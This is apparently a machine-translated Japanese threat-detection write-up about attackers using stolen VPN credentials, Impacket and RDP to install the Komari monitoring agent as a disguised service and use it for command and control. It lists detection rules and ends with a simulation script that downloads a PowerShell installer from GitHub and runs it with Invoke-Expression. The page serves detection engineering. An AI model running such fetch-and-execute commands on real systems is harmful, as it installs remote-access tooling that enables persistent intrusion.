Komari: 武器化の必要がなかった “モニタリング” ツール
Detection stack
- AIDR
- Alert
- ETL
- Query
概要
脅威アクターが盗まれたVPN資格情報を使用してHuntressパートナーのWindowsワークステーションにアクセスし、RDPを有効にして、NSSMを通じてWindows Update Serviceに偽装したSYSTEMレベルのサービスとしてオープンソースのKomari監視エージェントをデプロイしました。インストールされると、このエージェントは攻撃者が制御するインフラストラクチャとの持続的なWebSocket接続を確立し、コマンド実行、ターミナルアクセス、ハートビート方式のピングなどの機能を提供しました。実際、このツールは追加の武器化を必要としない軽量のコマンドアンドコントロールフレームワークとして機能しました。
調査
侵入は次の場所からのSSL VPNログインで始まりました 45.153.34.132、その後、Impacketの smbexec.py を使用してRDPを有効にし、一連のリモートコマンドを実行しました。調査官は、PowerShellワンライナーが直接GitHubからKomariインストーラーをダウンロードし、Windowsサービスとして登録したことを発見しました。そのサービスは次に komari-agent.exeを起動し、攻撃者のサーバーにWebSocketセッションを開き、ホスト上で任意のリモートコマンド実行を可能にしました。
緩和策
Huntressは、妥協されたワークステーションを隔離し、影響を受けたユーザーアカウントを無効にし、NSSMが作成したKomariサービスを停止することで対応しました。悪意のあるWebSocket接続がブロックされ、持続メカニズムがシステムから削除されました。推奨されるフォローアップ防御策には、VPNアクセス制御の強化、疑わしいサービス作成イベントの監視、アウトバウンドWebSocket活動の調査、およびRDPセキュリティの強化が含まれます。
対応
Windows Update Serviceとして名前が付けられたWindowsサービスの作成を検出し、それが komari-agent.exeを指している場合、見慣れないホストへの長時間存続するアウトバウンドWebSocket接続を監視し、横移動のためのImpacketツールの使用に警告します。 smbexec.py が特定された場合、影響を受けたエンドポイントは直ちに封じ込め、妥協した資格情報を取り消し、不正なサービスを環境から除去すべきです。
アタックフロー
検出
Impacketコマンドラインパターンの可能性(cmdline経由)
表示
Impacketを使用したリモートコード実行の可能性(cmdline経由)
表示
バイパス実行ポリシーを使用して怪しいディレクトリにファイルを実行するPowershell(cmdline経由)
表示
Powershellを介したダウンロードまたはアップロード(cmdline経由)
表示
リモートデスクトップサービスのシャドウイングの可能性(process_creation経由)
表示
CLIを通じた疑わしいファイアウォール変更(cmdline経由)
表示
コマンドラインにURLを使用する疑わしいプロセス(cmdline経由)
表示
代替リモートアクセス/管理ソフトウェア(process_creation経由)
表示
検出するためのIOC(HashSha256):Komari:武器化を必要としなかった「監視」ツール
表示
検出するためのIOC(SourceIP):Komari:武器化を必要としなかった「監視」ツール
表示
検出するためのIOC(DestinationIP):Komari:武器化を必要としなかった「監視」ツール
表示
Impacket smbexec.pyおよびcmd.exeの実行の検出(RDP経由)[Windowsプロセス作成]
表示
KomariエージェントインストールのPowerShell実行[Windows PowerShell]
表示
Windows Update Serviceを介したKomariエージェントの持続性を検出する[Windowsシステム]
表示
無許可のSSLVPNアクセスおよび妥協後の活動の検出[ファイアウォール]
表示
シミュレーション実行
前提条件:テレメトリ&ベースラインのプリフライトチェックが合格している必要があります。
-
攻撃の説明とコマンド:
敵はWindowsホストに足がかりを得て、Komari C2エージェントをインストールして持続性を維持し、後で資格情報(T1003.001)をダンプしようとしています。従来のスクリプトブロッキング防御を回避するために、攻撃者は-ExecutionPolicy Bypassを使用してPowerShellを実行し、公開されているGitHubリポジトリから直接インストーラーをダウンロードします。このコマンドラインは検出ルールに正確に一致し、予期されたテレメトリを生成します。 -
回帰テストスクリプト:
# Komariエージェントインストールシミュレーション $url = "https://raw.githubusercontent.com/komari-monitor/komari-agent/main/install.ps1" $script = (New-Object System.Net.WebClient).DownloadString($url) Invoke-Expression $script -
クリーンアップコマンド:
# シミュレーションインストーラーによって作成されたファイルを削除する(ある場合) Remove-Item -Path "$Env:ProgramFilesKomari" -Recurse -Force -ErrorAction SilentlyContinue # 開始したかもしれないKomariプロセスを停止する Get-Process -Name "Komari" -ErrorAction SilentlyContinue | Stop-Process -Force